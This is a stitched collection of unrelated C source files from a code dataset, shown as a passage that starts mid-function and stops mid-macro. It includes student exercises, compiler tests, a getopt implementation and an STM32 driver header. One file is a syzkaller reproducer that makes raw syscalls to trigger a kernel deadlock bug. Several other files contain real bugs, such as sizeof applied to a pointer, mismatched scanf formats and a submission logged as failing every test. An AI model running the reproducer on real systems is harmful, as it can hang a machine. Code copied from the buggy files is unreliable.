(c == '#') { directive = IN; } if ( c == '\\') { c = getch(); /* ignore the \\ character */ } if (comment == OUT && string == OUT && directive == OUT) { if (c != EOF) *w++ = c; if (!isalnum(c) && c !='_' ) { *w = '\0'; return c; } for ( ; --lim > 0; w++) { *w = getch(); if (!isalnum(*w) && *w != '_') { ungetch(*w); break; } } *w = '\0'; return word[0]; } else if ( comment == IN) { *w++ = c; *w++ = d; while ((*w++ = c = getch())) { if ( c == '*' ) { if ( (c = getch()) == '/' ) { *w++ = c; comment = OUT; break; } else { ungetch(c); } } } *w = '\0'; } else if ( string == IN) { *w++ = c; while ((*w++ = getch()) != '\"') { if ( *w == '\\') /* Take care of escaped quotes */ *w++ = getch(); } string = OUT; *w = '\0'; } else if (directive == IN) { *w++ = c; while ((*w++ = getch()) != '\n') { if ( c == '\\') { /* Take care of continuation line escape */ *w++ = getch(); } } directive = OUT; *w = '\0'; } return c; } #define BUFSIZE 100 char buf[BUFSIZE]; /* buffer for ungetch */ int bufp = 0; /* next free position in buf */ int getch(void) /* get a (possibly pushed back) character */ { return ( bufp > 0)? buf[--bufp] : getchar(); } void ungetch(int c) /* push a character back on input */ { if(bufp >= BUFSIZE) printf("ungetch: too many characters \n"); else buf[bufp++] = c; }
the_stack_data/24796.c
// // Created by hpcomputer on 2019/11/23. // #include<stdio.h> int get_array_length(int *arr){ return sizeof(arr) / sizeof(arr[0]); } //int get_string_length(char string){ // return strlen(string); //}
the_stack_data/89199134.c
int maxSubArray(int *nums, int numsSize) { if (!numsSize) return(0); int i, glo_max, loc_max, t; loc_max = glo_max = nums[0]; for (i = 1; i < numsSize; i++) { t = loc_max + nums[i]; loc_max = t > nums[i] ? t : nums[i]; glo_max = glo_max > loc_max ? glo_max : loc_max; } return(glo_max); } #include <stdio.h> int main(void) { int x[] = { -2, 1, -3, 4, -1, 2, 1, -5, 4 }; printf("%d\n", maxSubArray(x, sizeof(x) / sizeof(int))); return(0); }
the_stack_data/86076516.c
int main() { return 0 || 0; }
the_stack_data/45450248.c
// // Created by zhangrongxiang on 2017/11/21 14:29 // File 3 // #include <stdio.h> #include <string.h> void main() { long long a = 1112744053; puts((char *) &a); }
the_stack_data/165768837.c
// BUILD: $CC bar.c -dynamiclib -o $BUILD_DIR/libbar.dylib -install_name $RUN_DIR/libbar.dylib // BUILD: $CC foo.c -dynamiclib $BUILD_DIR/libbar.dylib -sub_library libbar -install_name $RUN_DIR/libfoo.dylib -o $BUILD_DIR/libfoo.dylib // BUILD: $CC main.c -o $BUILD_DIR/dylib-re-export.exe $BUILD_DIR/libfoo.dylib -L$BUILD_DIR // RUN: ./dylib-re-export.exe #include <stdio.h> extern int bar(); int main() { printf("[BEGIN] dylib-re-export\n"); if ( bar() == 42 ) printf("[PASS] dylib-re-export\n"); else printf("[FAIL] dylib-re-export, wrong value\n"); return 0; }
the_stack_data/181394312.c
#include <stdlib.h> #include <stdio.h> #include <math.h> #include <sys/time.h> // grid size #define GRIDY 2048 #define GRIDX 2048 #define MAX(X,Y) ((X) > (Y) ? (X) : (Y)) // smallest permitted change in temperature #define MAX_TEMP_ERROR 0.02 double T_new[GRIDX+2][GRIDY+2]; // temperature grid double T[GRIDX+2][GRIDY+2]; // temperature grid from last iteration // initialisation routine void init(); int main(int argc, char *argv[]) { int i, j; // grid indexes int max_iterations; // maximal number of iterations int iteration=1; // iteration double dt=100; // largest change in temperature struct timeval start_time, stop_time, elapsed_time; // timers if(argc!=2) { printf("Usage: %s number_of_iterations\n",argv[0]); exit(1); } else { max_iterations=atoi(argv[1]); } gettimeofday(&start_time,NULL); init(); // simulation iterations while ( dt > MAX_TEMP_ERROR && iteration <= max_iterations ) { // main computational kernel, average over neighbours in the grid for(i = 1; i <= GRIDX; i++) for(j = 1; j <= GRIDY; j++) T_new[i][j] = 0.25 * (T[i+1][j] + T[i-1][j] + T[i][j+1] + T[i][j-1]); // reset dt dt = 0.0; // compute the largest change and copy T_new to T for(i = 1; i <= GRIDX; i++){ for(j = 1; j <= GRIDY; j++){ dt = MAX( fabs(T_new[i][j]-T[i][j]), dt); T[i][j] = T_new[i][j]; } } // periodically print largest change if((iteration % 100) == 0) printf("Iteration %4.0d, dt %f\n",iteration,dt); iteration++; } gettimeofday(&stop_time,NULL); timersub(&stop_time, &start_time, &elapsed_time); // measure time printf("Total time was %f seconds.\n", elapsed_time.tv_sec+elapsed_time.tv_usec/1000000.0); return 0; } // initialize grid and boundary conditions void init(){ int i,j; for(i = 0; i <= GRIDX+1; i++){ for (j = 0; j <= GRIDY+1; j++){ T[i][j] = 0.0; } } // these boundary conditions never change throughout run // set left side to 0 and right to a linear increase for(i = 0; i <= GRIDX+1; i++) { T[i][0] = 0.0; T[i][GRIDY+1] = (128.0/GRIDX)*i; } // set top to 0 and bottom to linear increase for(j = 0; j <= GRIDY+1; j++) { T[0][j] = 0.0; T[GRIDX+1][j] = (128.0/GRIDY)*j; } }
the_stack_data/144865.c
// possible deadlock in get_user_pages_unlocked (2) // https://syzkaller.appspot.com/bug?id=196df9e8c6d3a8559180f7a6a224e63e82655ffb // status:invalid // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include <endian.h> #include <errno.h> #include <fcntl.h> #include <sched.h> #include <stdarg.h> #include <stdbool.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/mount.h> #include <sys/prctl.h> #include <sys/resource.h> #include <sys/stat.h> #include <sys/syscall.h> #include <sys/time.h> #include <sys/types.h> #include <sys/wait.h> #include <unistd.h> static bool write_file(const char* file, const char* what, ...) { char buf[1024]; va_list args; va_start(args, what); vsnprintf(buf, sizeof(buf), what, args); va_end(args); buf[sizeof(buf) - 1] = 0; int len = strlen(buf); int fd = open(file, O_WRONLY | O_CLOEXEC); if (fd == -1) return false; if (write(fd, buf, len) != len) { int err = errno; close(fd); errno = err; return false; } close(fd); return true; } static void setup_common() { if (mount(0, "/sys/fs/fuse/connections", "fusectl", 0, 0)) { } } static void loop(); static void sandbox_common() { prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0); setpgrp(); setsid(); struct rlimit rlim; rlim.rlim_cur = rlim.rlim_max = (200 << 20); setrlimit(RLIMIT_AS, &rlim); rlim.rlim_cur = rlim.rlim_max = 32 << 20; setrlimit(RLIMIT_MEMLOCK, &rlim); rlim.rlim_cur = rlim.rlim_max = 136 << 20; setrlimit(RLIMIT_FSIZE, &rlim); rlim.rlim_cur = rlim.rlim_max = 1 << 20; setrlimit(RLIMIT_STACK, &rlim); rlim.rlim_cur = rlim.rlim_max = 0; setrlimit(RLIMIT_CORE, &rlim); rlim.rlim_cur = rlim.rlim_max = 256; setrlimit(RLIMIT_NOFILE, &rlim); if (unshare(CLONE_NEWNS)) { } if (unshare(CLONE_NEWIPC)) { } if (unshare(0x02000000)) { } if (unshare(CLONE_NEWUTS)) { } if (unshare(CLONE_SYSVSEM)) { } typedef struct { const char* name; const char* value; } sysctl_t; static const sysctl_t sysctls[] = { {"/proc/sys/kernel/shmmax", "16777216"}, {"/proc/sys/kernel/shmall", "536870912"}, {"/proc/sys/kernel/shmmni", "1024"}, {"/proc/sys/kernel/msgmax", "8192"}, {"/proc/sys/kernel/msgmni", "1024"}, {"/proc/sys/kernel/msgmnb", "1024"}, {"/proc/sys/kernel/sem", "1024 1048576 500 1024"}, }; unsigned i; for (i = 0; i < sizeof(sysctls) / sizeof(sysctls[0]); i++) write_file(sysctls[i].name, sysctls[i].value); } int wait_for_loop(int pid) { if (pid < 0) exit(1); int status = 0; while (waitpid(-1, &status, __WALL) != pid) { } return WEXITSTATUS(status); } static int do_sandbox_none(void) { if (unshare(CLONE_NEWPID)) { } int pid = fork(); if (pid != 0) return wait_for_loop(pid); setup_common(); sandbox_common(); if (unshare(CLONE_NEWNET)) { } loop(); exit(1); } uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; void loop(void) { intptr_t res = 0; memcpy((void*)0x2000fffa, "./bus\000", 6); res = syscall(__NR_open, 0x2000fffa, 0x141042, 0); if (res != -1) r[0] = res; syscall(__NR_mmap, 0x20001000, 0xa000, 0x800002, 0x11, r[0], 0); syscall(__NR_mprotect, 0x20000000, 0x800000, 6); memcpy((void*)0x200000c0, "memory.events\000", 14); syscall(__NR_openat, 0xffffff9c, 0x200000c0, 0x26e1, 0); memcpy((void*)0x20000140, "memory.events\000", 14); res = syscall(__NR_openat, 0xffffff9c, 0x20000140, 0x7a05, 0x1700); if (res != -1) r[1] = res; sprintf((char*)0x20000000, "0x%016llx", (long long)0); syscall(__NR_write, r[1], 0x20000000, 0x20000012); } int main(void) { syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0); do_sandbox_none(); return 0; }
the_stack_data/75856.c
#include <stdio.h> static struct sss{ int f; char :0; int i; } sss; #define _offsetof(st,f) ((char *)&((st *) 16)->f - (char *) 16) int main (void) { printf ("+++char zerofield inside struct starting with int:\n"); printf ("size=%d,align=%d\n", sizeof (sss), __alignof__ (sss)); printf ("offset-int=%d,offset-last=%d,\nalign-int=%d,align-last=%d\n", _offsetof (struct sss, f), _offsetof (struct sss, i), __alignof__ (sss.f), __alignof__ (sss.i)); return 0; }
the_stack_data/179831913.c
// RUN: %clang -target riscv32-unknown-linux-gnu -march=rv32i -x c -E -dM %s \ // RUN: -o - | FileCheck %s // RUN: %clang -target riscv64-unknown-linux-gnu -march=rv64i -x c -E -dM %s \ // RUN: -o - | FileCheck %s // CHECK-NOT: __riscv_div // CHECK-NOT: __riscv_m // CHECK-NOT: __riscv_mul // CHECK-NOT: __riscv_muldiv // CHECK-NOT: __riscv_a 2000000 // CHECK-NOT: __riscv_atomic // CHECK-NOT: __riscv_f 2000000 // CHECK-NOT: __riscv_d // CHECK-NOT: __riscv_flen // CHECK-NOT: __riscv_fdiv // CHECK-NOT: __riscv_fsqrt // CHECK-NOT: __riscv_c 2000000 // CHECK-NOT: __riscv_compressed // CHECK-NOT: __riscv_b // CHECK-NOT: __riscv_bitmanip // CHECK-NOT: __riscv_zba // CHECK-NOT: __riscv_zbb // CHECK-NOT: __riscv_zbc // CHECK-NOT: __riscv_zbe // CHECK-NOT: __riscv_zbf // CHECK-NOT: __riscv_zbm // CHECK-NOT: __riscv_zbp // CHECK-NOT: __riscv_zbr // CHECK-NOT: __riscv_zbs // CHECK-NOT: __riscv_zbt // CHECK-NOT: __riscv_zfh // CHECK-NOT: __riscv_v // CHECK-NOT: __riscv_vector // CHECK-NOT: __riscv_zvamo // CHECK-NOT: __riscv_zvlsseg // RUN: %clang -target riscv32-unknown-linux-gnu -march=rv32im -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-M-EXT %s // RUN: %clang -target riscv64-unknown-linux-gnu -march=rv64im -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-M-EXT %s // CHECK-M-EXT: __riscv_div 1 // CHECK-M-EXT: __riscv_m 2000000 // CHECK-M-EXT: __riscv_mul 1 // CHECK-M-EXT: __riscv_muldiv 1 // RUN: %clang -target riscv32-unknown-linux-gnu -march=rv32ia -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-A-EXT %s // RUN: %clang -target riscv64-unknown-linux-gnu -march=rv64ia -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-A-EXT %s // CHECK-A-EXT: __riscv_a 2000000 // CHECK-A-EXT: __riscv_atomic 1 // RUN: %clang -target riscv32-unknown-linux-gnu -march=rv32if -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-F-EXT %s // RUN: %clang -target riscv64-unknown-linux-gnu -march=rv64if -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-F-EXT %s // CHECK-F-EXT: __riscv_f 2000000 // CHECK-F-EXT: __riscv_fdiv 1 // CHECK-F-EXT: __riscv_flen 32 // CHECK-F-EXT: __riscv_fsqrt 1 // RUN: %clang -target riscv32-unknown-linux-gnu -march=rv32ifd -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-D-EXT %s // RUN: %clang -target riscv64-unknown-linux-gnu -march=rv64ifd -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-D-EXT %s // CHECK-D-EXT: __riscv_d 2000000 // CHECK-D-EXT: __riscv_fdiv 1 // CHECK-D-EXT: __riscv_flen 64 // CHECK-D-EXT: __riscv_fsqrt 1 // RUN: %clang -target riscv32-unknown-linux-gnu -march=rv32ifd -mabi=ilp32 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-SOFT %s // RUN: %clang -target riscv64-unknown-linux-gnu -march=rv64ifd -mabi=lp64 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-SOFT %s // CHECK-SOFT: __riscv_float_abi_soft 1 // CHECK-SOFT-NOT: __riscv_float_abi_single // CHECK-SOFT-NOT: __riscv_float_abi_double // RUN: %clang -target riscv32-unknown-linux-gnu -march=rv32ifd -mabi=ilp32f -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-SINGLE %s // RUN: %clang -target riscv64-unknown-linux-gnu -march=rv64ifd -mabi=lp64f -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-SINGLE %s // CHECK-SINGLE: __riscv_float_abi_single 1 // CHECK-SINGLE-NOT: __riscv_float_abi_soft // CHECK-SINGLE-NOT: __riscv_float_abi_double // RUN: %clang -target riscv32-unknown-linux-gnu -march=rv32ifd -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-DOUBLE %s // RUN: %clang -target riscv64-unknown-linux-gnu -march=rv64ifd -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-DOUBLE %s // CHECK-DOUBLE: __riscv_float_abi_double 1 // CHECK-DOUBLE-NOT: __riscv_float_abi_soft // CHECK-DOUBLE-NOT: __riscv_float_abi_single // RUN: %clang -target riscv32-unknown-linux-gnu -march=rv32ic -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-C-EXT %s // RUN: %clang -target riscv64-unknown-linux-gnu -march=rv64ic -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-C-EXT %s // CHECK-C-EXT: __riscv_c 2000000 // CHECK-C-EXT: __riscv_compressed 1 // RUN: %clang -target riscv32-unknown-linux-gnu -menable-experimental-extensions \ // RUN: -march=rv32izba0p93 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-ZBA-EXT %s // RUN: %clang -target riscv64-unknown-linux-gnu -menable-experimental-extensions \ // RUN: -march=rv64izba0p93 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-ZBA-EXT %s // CHECK-ZBA-NOT: __riscv_b // CHECK-ZBA-EXT: __riscv_zba 93000 // RUN: %clang -target riscv32-unknown-linux-gnu -menable-experimental-extensions \ // RUN: -march=rv32izbb0p93 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-ZBB-EXT %s // RUN: %clang -target riscv64-unknown-linux-gnu -menable-experimental-extensions \ // RUN: -march=rv64izbb0p93 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-ZBB-EXT %s // CHECK-ZBB-NOT: __riscv_b // CHECK-ZBB-EXT: __riscv_zbb 93000 // RUN: %clang -target riscv32-unknown-linux-gnu -menable-experimental-extensions \ // RUN: -march=rv32izbc0p93 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-ZBC-EXT %s // RUN: %clang -target riscv64-unknown-linux-gnu -menable-experimental-extensions \ // RUN: -march=rv64izbc0p93 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-ZBC-EXT %s // CHECK-ZBC-NOT: __riscv_b // CHECK-ZBC-EXT: __riscv_zbc 93000 // RUN: %clang -target riscv32-unknown-linux-gnu -menable-experimental-extensions \ // RUN: -march=rv32izbe0p93 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-ZBE-EXT %s // RUN: %clang -target riscv64-unknown-linux-gnu -menable-experimental-extensions \ // RUN: -march=rv64izbe0p93 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-ZBE-EXT %s // CHECK-ZBE-NOT: __riscv_b // CHECK-ZBE-EXT: __riscv_zbe 93000 // RUN: %clang -target riscv32-unknown-linux-gnu -menable-experimental-extensions \ // RUN: -march=rv32izbf0p93 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-ZBF-EXT %s // RUN: %clang -target riscv64-unknown-linux-gnu -menable-experimental-extensions \ // RUN: -march=rv64izbf0p93 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-ZBF-EXT %s // CHECK-ZBF-NOT: __riscv_b // CHECK-ZBF-EXT: __riscv_zbf 93000 // RUN: %clang -target riscv32-unknown-linux-gnu -menable-experimental-extensions \ // RUN: -march=rv32izbm0p93 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-ZBM-EXT %s // RUN: %clang -target riscv64-unknown-linux-gnu -menable-experimental-extensions \ // RUN: -march=rv64izbm0p93 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-ZBM-EXT %s // CHECK-ZBM-NOT: __riscv_b // CHECK-ZBM-EXT: __riscv_zbm 93000 // RUN: %clang -target riscv32-unknown-linux-gnu -menable-experimental-extensions \ // RUN: -march=rv32izbp0p93 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-ZBP-EXT %s // RUN: %clang -target riscv64-unknown-linux-gnu -menable-experimental-extensions \ // RUN: -march=rv64izbp0p93 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-ZBP-EXT %s // CHECK-ZBP-NOT: __riscv_b // CHECK-ZBP-EXT: __riscv_zbp 93000 // RUN: %clang -target riscv32-unknown-linux-gnu -menable-experimental-extensions \ // RUN: -march=rv32izbr0p93 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-ZBR-EXT %s // RUN: %clang -target riscv64-unknown-linux-gnu -menable-experimental-extensions \ // RUN: -march=rv64izbr0p93 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-ZBR-EXT %s // CHECK-ZBR-NOT: __riscv_b // CHECK-ZBR-EXT: __riscv_zbr 93000 // RUN: %clang -target riscv32-unknown-linux-gnu -menable-experimental-extensions \ // RUN: -march=rv32izbs0p93 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-ZBS-EXT %s // RUN: %clang -target riscv64-unknown-linux-gnu -menable-experimental-extensions \ // RUN: -march=rv64izbs0p93 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-ZBS-EXT %s // CHECK-ZBS-NOT: __riscv_b // CHECK-ZBS-EXT: __riscv_zbs 93000 // RUN: %clang -target riscv32-unknown-linux-gnu -menable-experimental-extensions \ // RUN: -march=rv32izbt0p93 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-ZBT-EXT %s // RUN: %clang -target riscv64-unknown-linux-gnu -menable-experimental-extensions \ // RUN: -march=rv64izbt0p93 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-ZBT-EXT %s // CHECK-ZBT-NOT: __riscv_b // CHECK-ZBT-EXT: __riscv_zbt 93000 // RUN: %clang -target riscv32-unknown-linux-gnu -menable-experimental-extensions \ // RUN: -march=rv32iv0p10 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-V-EXT %s // RUN: %clang -target riscv64-unknown-linux-gnu -menable-experimental-extensions \ // RUN: -march=rv64iv0p10 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-V-EXT %s // RUN: %clang -target riscv32-unknown-linux-gnu -menable-experimental-extensions \ // RUN: -march=rv32izvlsseg0p10 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-V-EXT %s // RUN: %clang -target riscv64-unknown-linux-gnu -menable-experimental-extensions \ // RUN: -march=rv32izvlsseg0p10 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-V-EXT %s // CHECK-V-EXT: __riscv_v 10000 // CHECK-V-EXT: __riscv_vector 1 // CHECK-V-EXT: __riscv_zvlsseg 10000 // RUN: %clang -target riscv32-unknown-linux-gnu -menable-experimental-extensions \ // RUN: -march=rv32izvamo0p10 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-ZVAMO-EXT %s // RUN: %clang -target riscv64-unknown-linux-gnu -menable-experimental-extensions \ // RUN: -march=rv32izvamo0p10 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-ZVAMO-EXT %s // CHECK-ZVAMO-EXT: __riscv_v 10000 // CHECK-ZVAMO-EXT: __riscv_vector 1 // CHECK-ZVAMO-EXT: __riscv_zvamo 10000 // CHECK-ZVAMO-EXT: __riscv_zvlsseg 10000 // RUN: %clang -target riscv32-unknown-linux-gnu -menable-experimental-extensions \ // RUN: -march=rv32izfh0p1 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-ZFH-EXT %s // RUN: %clang -target riscv64-unknown-linux-gnu -menable-experimental-extensions \ // RUN: -march=rv64izfh0p1 -x c -E -dM %s \ // RUN: -o - | FileCheck --check-prefix=CHECK-ZFH-EXT %s // CHECK-ZFH-EXT: __riscv_zfh 1000
the_stack_data/6388347.c
/* { dg-do run } */ /* { dg-options "-O2" } */ struct A { int a; int b; }; struct A a; const int B = 42; void foo (int i) { if (i > 10) a.a = 42; else { a.b = 21; a.a = a.b + 21; } /* This should be folded to 'if (0)' as a.a and B are both 42. */ if (a.a != B) link_error (); } main () { foo (3); return 0; }
the_stack_data/43887839.c
/* ************************************************ username : smmehrab fullname : s.m.mehrabul islam email : [email protected] institute : university of dhaka, bangladesh session : 2017-2018 ************************************************ */ #include<stdio.h> typedef long long int ll; int gcd(int a, int b) {if (b == 0) return a; return gcd(b, a % b);} ll lcm(int arr[], int n) { ll ans = arr[0],i; for (i = 1; i < n; i++) ans = (((arr[i] * ans)) /(gcd(arr[i], ans))); return ans; } int main() { int a[100000],n,i; scanf("%lld",&n); for(i=0;i<n;i++) scanf("%lld",&a[i]); printf("%lld", lcm(a,n)); return 0; }
the_stack_data/87637137.c
/* (C) Copyright 1993,1994 by Carnegie Mellon University * All Rights Reserved. * * Permission to use, copy, modify, distribute, and sell this software * and its documentation for any purpose is hereby granted without * fee, provided that the above copyright notice appear in all copies * and that both that copyright notice and this permission notice * appear in supporting documentation, and that the name of Carnegie * Mellon University not be used in advertising or publicity * pertaining to distribution of the software without specific, * written prior permission. Carnegie Mellon University makes no * representations about the suitability of this software for any * purpose. It is provided "as is" without express or implied * warranty. * * CARNEGIE MELLON UNIVERSITY DISCLAIMS ALL WARRANTIES WITH REGARD TO * THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY * AND FITNESS, IN NO EVENT SHALL CARNEGIE MELLON UNIVERSITY BE LIABLE * FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN * AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING * OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS * SOFTWARE. */ #include <stdio.h> #ifdef __OS2__ # include <io.h> #endif #if defined(__MSDOS__) || defined(__OS2__) #define ERR(s, c) \ if (opterr) { \ char buff[3]; \ buff[0] = c; buff[1] = '\r'; buff[2] = '\n'; \ (void)write(2, av[0], strlen(av[0])); \ (void)write(2, s, strlen(s)); \ (void)write(2, buff, 3); \ } #else /* __MSDOS__ */ #define ERR(s, c) \ if (opterr) { \ char buff[2]; \ buff[0] = c; buff[1] = '\n'; \ (void)write(2, av[0], strlen(av[0])); \ (void)write(2, s, strlen(s)); \ (void)write(2, buff, 2); \ } #endif int opterr = 1; int optind = 1; int optopt; char *optarg; /* ** Return options and their values from the command line. ** This comes from the AT&T public-domain getopt published in mod.sources ** (i.e., comp.sources.unix before the great Usenet renaming). */ int getopt(ac, av, opts) int ac; char *av[]; char *opts; { extern char *strchr(); static int i = 1; char *p; /* Move to next value from argv? */ if (i == 1) { if (optind >= ac || #if defined(__MSDOS__) || defined(__OS2__) (av[optind][0] != '-' && av[optind][0] != '/') #else av[optind][0] != '-' #endif || av[optind][1] == '\0') return EOF; if (strcmp(av[optind], "--") == 0) { optind++; return EOF; } } /* Get next option character. */ if ((optopt = av[optind][i]) == ':' || (p = strchr(opts, optopt)) == NULL) { ERR(": illegal option -- ", optopt); if (av[optind][++i] == '\0') { optind++; i = 1; } return '?'; } /* Snarf argument? */ if (*++p == ':') { if (av[optind][i + 1] != '\0') optarg = &av[optind++][i + 1]; else { if (++optind >= ac) { ERR(": option requires an argument -- ", optopt); i = 1; return '?'; } optarg = av[optind++]; } i = 1; } else { if (av[optind][++i] == '\0') { i = 1; optind++; } optarg = NULL; } return optopt; }
the_stack_data/150141078.c
#include<stdio.h> void print_table(int *mul_table,int a) { int num; printf("which table you wants to print :"); scanf("%d",&num); printf("multiplication table of %d :-\n",num); for(int i=0;i<a;i++) { mul_table[i]=num*(i+1); } for(int i=0;i<a;i++) { printf("%d * %d = %d \n",num,i+1,mul_table[i]); } printf("************************************\n"); } int main() { int m ,n ; printf("How many tables you wants to print :"); scanf("%d",&m); printf("How much tables you wants to print :"); scanf("%d",&n); int mul_table[m][n]; for(int i=0;i<m;i++) { print_table(mul_table[i],n); } return 0; }
the_stack_data/200144034.c
/*numPass=0, numTotal=5 Verdict:WRONG_ANSWER, Visibility:1, Input:"2", ExpOutput:"2 -3 2 ", Output:"-8 -3 -8 " Verdict:WRONG_ANSWER, Visibility:1, Input:"20", ExpOutput:"20 15 10 5 0 5 10 15 20 ", Output:"20 15 10 -5 0 -5 10 15 20 " Verdict:WRONG_ANSWER, Visibility:1, Input:"4", ExpOutput:"4 -1 4 ", Output:"-6 -1 -6 " Verdict:WRONG_ANSWER, Visibility:0, Input:"16", ExpOutput:"16 11 6 1 -4 1 6 11 16 ", Output:"16 -4 1 1 -4 16 " Verdict:WRONG_ANSWER, Visibility:0, Input:"8", ExpOutput:"8 3 -2 3 8 ", Output:"-7 -2 -2 -7 " */ #include <stdio.h> int a[100]; void pat(int n,int q,int i){ while(i<=(q/2)+1){ a[i]=n; a[q-i-1]=n; return pat(n-5,q,i+1); } } int main(){ int x; scanf("%d",&x); int q; if(x%5==0)q = 2*(x/5) + 1; else{ q = (x/5) + 3; } int i=0; pat(x,q,i); for(i=0;i<q;i++){ printf("%d ",a[i]); } return 0; }
the_stack_data/712353.c
//oddeven2 by zawa-ch. //最初のビットが1か0かを使って偶数・奇数を判断する #include<stdio.h> int main(void) { int va; //初期化処理 puts("整数を入力してください。\n偶数・奇数を判別します。"); //整数の入力を求める printf("整数 : "); scanf("%d", &va); if (va & 1) //最初のビットが0か1か判断(1なら奇数、0なら偶数) printf("%dは奇数です。\n", va); else printf("%dは偶数です。\n", va); return 0; }
the_stack_data/40761612.c
/** ****************************************************************************** * @file stm32l4xx_ll_dma.c * @author MCD Application Team * @version V1.6.0 * @date 28-October-2016 * @brief DMA LL module driver. ****************************************************************************** * @attention * * <h2><center>&copy; COPYRIGHT(c) 2016 STMicroelectronics</center></h2> * * Redistribution and use in source and binary forms, with or without modification, * are permitted provided that the following conditions are met: * 1. Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * 3. Neither the name of STMicroelectronics nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * ****************************************************************************** */ #if defined(USE_FULL_LL_DRIVER) /* Includes ------------------------------------------------------------------*/ #include "stm32l4xx_ll_dma.h" #include "stm32l4xx_ll_bus.h" #ifdef USE_FULL_ASSERT #include "stm32_assert.h" #else #define assert_param(expr) ((void)0U) #endif /** @addtogroup STM32L4xx_LL_Driver * @{ */ #if defined (DMA1) || defined (DMA2) /** @defgroup DMA_LL DMA * @{ */ /* Private types -------------------------------------------------------------*/ /* Private variables ---------------------------------------------------------*/ /* Private constants ---------------------------------------------------------*/ /* Private macros ------------------------------------------------------------*/ /** @addtogroup DMA_LL_Private_Macros * @{ */ #define IS_LL_DMA_DIRECTION(__VALUE__) (((__VALUE__) == LL_DMA_DIRECTION_PERIPH_TO_MEMORY) || \ ((__VALUE__) == 